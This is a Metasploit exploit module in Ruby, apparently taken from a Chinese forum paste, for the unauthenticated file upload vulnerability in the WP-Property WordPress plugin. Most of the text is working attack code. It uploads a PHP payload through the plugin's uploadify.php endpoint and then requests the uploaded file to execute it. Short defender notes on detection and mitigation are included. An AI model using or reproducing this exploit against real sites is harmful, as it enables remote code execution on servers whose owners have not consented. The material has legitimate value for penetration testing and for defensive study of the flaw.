WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

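# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description). The plugin ships
# third-party/uploadify/uploadify.php, which accepts a multipart upload without
# authentication; the module then requests the path the server reports back.
#
# Restored from a forum paste: the injected filler characters are stripped and
# the mixin name, which the forum had rewritten to "Msf::Exploit:hpEXE", is put
# back to Msf::Exploit::PhpEXE (the mixin loaded by msf/core/exploit/php_exe).
#
# Defender notes, derived only from the requests this module sends:
# - Detection: a POST to .../wp-property/third-party/uploadify/uploadify.php
#   carrying a "Filedata" part whose filename ends in .php and a "folder" part
#   pointing at the uploadify directory, followed by a GET for that file.
# - Forensics: the payload is built with :unlink_self, so the uploaded file is
#   presumably removed once it has run (behaviour of the PhpEXE mixin, not
#   shown here); web-server access logs are the more durable evidence.
# - Mitigation: move the plugin to a release outside the affected range or
#   remove uploadify.php, and deny PHP execution in directories that accept
#   uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the single TARGETURI option.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify endpoint with a plain GET.
  #
  # An HTTP 200 only shows that uploadify.php is present and reachable; the
  # plugin version is never inspected, which is why the strongest result
  # returned here is Appears rather than Vulnerable.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    # No response or any non-200 status: nothing can be concluded.
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the payload through uploadify.php and then requests the path that
  # the server returned in the response body.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Five random letters plus ".php"; the name is kept in an instance
    # variable because it is reused in the status messages and reply check.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a "--_Part_" boundary line in the
    # serialized MIME message before it is sent as the request body.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The upload counts as accepted only when the reply is a 200 whose body
    # mentions the generated file name.
    if !res || res.code != 200 || res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the URI of the follow-up request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end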

不要问我这写的是什么 怎么利用 我是说msf.